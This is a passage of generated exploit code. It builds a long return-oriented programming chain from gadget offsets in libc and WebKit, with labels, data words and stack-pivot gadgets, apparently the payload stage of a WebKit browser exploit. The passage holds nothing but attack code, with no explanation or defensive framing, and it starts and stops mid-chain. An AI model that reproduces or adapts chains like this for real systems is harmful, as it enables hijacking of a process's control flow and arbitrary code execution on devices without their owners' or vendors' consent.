ropchain+125032, //L1544
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+125016, //L1542
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1542:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1544:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+125176, //L1547
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+125144, //L1545
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+125160, //L1546
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1545:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1546:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1547:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+125248, //L1549
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1549:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+125304, //L1550
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1550:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+125400, //L1553
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1552:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1553:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1554:
db([34, 0]); // 0x22
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+125496, //L1555
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+125512, //L1556
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1555:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1556:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+125600, //L1558
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1558:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+125656, //L1559
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1559:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+125728, //L1562
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1562:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+125784, //L1563
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1563:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1565:
libc_base+782311, //pop rsp
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+125920, //L1566
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1566:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1568:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+126040, //L1571
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+126024, //L1569
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1569:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1571:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+126184, //L1574
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+126152, //L1572
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+126168, //L1573
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1572:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1573:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1574:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+126256, //L1576
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1576:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+126312, //L1577
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1577:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+126408, //L1580
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1579:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1580:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1581:
db([35, 0]); // 0x23
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+126504, //L1582
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+126520, //L1583
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1582:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1583:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+126608, //L1585
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1585:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+126664, //L1586
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1586:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+126736, //L1589
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1589:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+126792, //L1590
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1590:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+126880, //L1592
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1592:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1594:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+127000, //L1597
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+126984, //L1595
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1595:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1597:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+127144, //L1600
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+127112, //L1598
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+127128, //L1599
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1598:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1599:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1600:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+127224, //L1601
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1601:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1603:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+127344, //L1606
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+127328, //L1604
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1604:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1606:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+127488, //L1609
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+127456, //L1607
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+127472, //L1608
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1607:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1608:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1609:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+127560, //L1611
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1611:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+127616, //L1612
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1612:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+127712, //L1615
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1614:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1615:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1616:
db([36, 0]); // 0x24
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+127808, //L1617
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+127824, //L1618
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1617:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1618:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+127912, //L1620
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1620:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+127968, //L1621
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1621:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+128040, //L1624
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1624:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+128096, //L1625
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1625:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1627:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+128232, //L1628
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1628:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1630:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+128352, //L1633
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+128336, //L1631
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1631:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1633:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+128496, //L1636
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+128464, //L1634
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+128480, //L1635
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1634:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1635:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1636:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+128568, //L1638
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1638:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+128624, //L1639
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1639:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+128720, //L1642
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1641:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1642:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1643:
db([37, 0]); // 0x25
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+128816, //L1644
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+128832, //L1645
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1644:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1645:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+128920, //L1647
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1647:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+128976, //L1648
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1648:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+129048, //L1651
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1651:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+129104, //L1652
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1652:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1654:
libc_base+756185, //mov rsp, rbp ; pop rbp
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+129240, //L1655
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1655:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1657:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+129360, //L1660
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+129344, //L1658
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1658:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1660:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+129504, //L1663
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+129472, //L1661
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+129488, //L1662
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1661:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1662:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1663:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+129576, //L1665
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1665:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+129632, //L1666
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1666:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+129728, //L1669
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1668:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1669:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1670:
db([38, 0]); // 0x26
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+129824, //L1671
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+129840, //L1672
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1671:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1672:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+129928, //L1674
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1674:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+129984, //L1675
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1675:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+130056, //L1678
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1678:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+130112, //L1679
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1679:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+130240, //L1682
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+130224, //L1681
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1681:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1682:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+130344, //L1683
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+130360, //L1684
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L1683:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1684:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+130480, //L1685
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+130464, //L1686
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L1686:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L1685:
db([0, 0]); // 0x0
//___sputc:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+130552, //L1688
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L1688:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+130640, //L1689
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+130688, //L1692
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L1689:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1690:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1691:
db([0, 0]); // 0x0
set_gadget(webkit_base+568675,); //pop r8
//L1692:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+130784, //L1694
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+130768, //L1693
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1693:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1694:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+130864, //L1695
